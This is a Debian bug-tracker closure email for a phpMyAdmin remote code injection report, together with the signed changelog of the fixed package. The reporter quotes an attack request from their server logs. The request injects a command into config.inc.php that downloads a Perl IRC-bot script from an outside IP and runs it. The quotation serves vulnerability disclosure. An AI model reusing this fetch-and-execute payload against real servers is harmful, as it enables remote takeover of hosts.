Your message dated Sun, 25 Oct 2009 19:57:50 +0000
with message-id <e1n29dq-0001vw...@ries.debian.org>
and subject line Bug#543460: fixed in phpmyadmin 4:2.9.1.1-13
has caused the Debian Bug report #543460,
regarding phpmyadmin: PHPMyAdmin seems to be vulnerable to some code injection
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
543460: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=543460
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: phpmyadmin
Version: 4:2.11.8.1-5+lenny1
Severity: critical
Tags: security
Justification: root security hole



Hi,

After looking at my logs, I did notice a lot of attempts to break in
phpmyadmin through the following kind of url:

82.79.155.33 - - [29/Jun/2009:03:32:31 +0200] "GET 
//phpmyadmin//config.inc.php?c=wget%20http://188.24.50.187/50.txt%20-O%20/tmp/50.txt;perl%20/tmp/50.txt%20%3E%3E/dev/null&;

It seems PHPMyAdmin shipped with Lenny is still vulnerable to this
remote exploit

It is basically an IRC bot

-- System Information:
Debian Release: 5.0.2
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.28.6-p390-20090217 (SMP w/4 CPU cores)
Locale: lang=fr...@euro, lc_ctype=fr...@euro (charmap=ISO-8859-15)
Shell: /bin/sh linked to /bin/bash

Versions of packages phpmyadmin depends on:
ii  debconf [debconf-2 1.5.24                Debian configuration management sy
ii  libapache2-mod-php 5.2.6.dfsg.1-1+lenny3 server-side, HTML-embedded scripti
ii  perl               5.10.0-19             Larry Wall's Practical Extraction 
ii  php5               5.2.6.dfsg.1-1+lenny3 server-side, HTML-embedded scripti
ii  php5-cgi           5.2.6.dfsg.1-1+lenny3 server-side, HTML-embedded scripti
ii  php5-mcrypt        5.2.6.dfsg.1-1+lenny3 MCrypt module for php5
ii  php5-mysql         5.2.6.dfsg.1-1+lenny3 MySQL module for php5

Versions of packages phpmyadmin recommends:
ii  apache2            2.2.9-10+lenny3       Apache HTTP Server metapackage
ii  apache2-mpm-prefor 2.2.9-10+lenny3       Apache HTTP Server - traditional n
ii  php5-gd            5.2.6.dfsg.1-1+lenny3 GD module for php5

Versions of packages phpmyadmin suggests:
ii  mysql-server-5.0 [mysq 5.0.51a-24+lenny1 MySQL database server binaries

-- debconf information:
  phpmyadmin/setup-username: admin
* phpmyadmin/reconfigure-webserver:
  phpmyadmin/restart-webserver: false



--- End Message ---
--- Begin Message ---
Source: phpmyadmin
Source-Version: 4:2.9.1.1-13

We believe that the bug you reported is fixed in the latest version of
phpmyadmin, which is due to be installed in the Debian FTP archive:

phpmyadmin_2.9.1.1-13.diff.gz
  to pool/main/p/phpmyadmin/phpmyadmin_2.9.1.1-13.diff.gz
phpmyadmin_2.9.1.1-13.dsc
  to pool/main/p/phpmyadmin/phpmyadmin_2.9.1.1-13.dsc
phpmyadmin_2.9.1.1-13_all.deb
  to pool/main/p/phpmyadmin/phpmyadmin_2.9.1.1-13_all.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 543...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Thijs Kinkhorst <th...@debian.org> (supplier of updated phpmyadmin package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.7
Date: Sun, 25 Oct 2009 12:25:47 +0100
Source: phpmyadmin
Binary: phpmyadmin
Architecture: source all
Version: 4:2.9.1.1-13
Distribution: oldstable-security
Urgency: high
Maintainer: Thijs Kinkhorst <th...@debian.org>
Changed-By: Thijs Kinkhorst <th...@debian.org>
Description: 
 phpmyadmin - Administrate MySQL over the WWW
Closes: 535044 543460 552194
Changes: 
 phpmyadmin (4:2.9.1.1-13) oldstable-security; urgency=low
 .
   * Fix inverted logic in documentation of new script.
 .
 phpmyadmin (4:2.9.1.1-12) oldstable-security; urgency=high
 .
   * Upload to oldstable to fix security issues.
   * Cross site scripting (CVE-2009-3696, closes: #552194).
   * Allow saving of configuration from setup script only after
     explicit action from administrator (closes: #535044, #543460).
Files: 
 0a8c412c5481b2260562ab5649c70d8b 1021 web extra phpmyadmin_2.9.1.1-13.dsc
 68fc6b7269343482b96326553dd1e0c0 57060 web extra phpmyadmin_2.9.1.1-13.diff.gz
 85eaa36525db64fdd0ba9955c9def399 3605314 web extra 
phpmyadmin_2.9.1.1-13_all.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iQEcBAEBAgAGBQJK5DbCAAoJECIIoQCMVaAcnqQIAJYA79w/IdQftDzenAXzRv41
YGmyo3SA0X3e76VeLdUstXJa+JvT5uKZNRVx3sh9s+HfIdETKKhNb1pkdla/RmZ1
X55bYpF8HIavS2tJcRaCn9E5txJs5epgz0bd2Mg1uhp3Y07EnbCAR19VG7nqIj87
HPT3CU/i5Y/0GO+JrWPt6Mh59TySEXzCHnDuSpPZUBMWxS5RgyQ7qjIu6HaStixv
IhMl1h4PKD05bwJ2fszHfbXEcP1wW+rQSslWjk3jJyuIGzJ7ES7lhSk6NGzAY8GV
2gUOOoq8aqWRbM1lU8sK+Qfj9lAyKhb1SdGBDky+MnEukId2ANwKZX082J+X/+M=
=DeBv
-----END PGP SIGNATURE-----



--- End Message ---

Reply via email to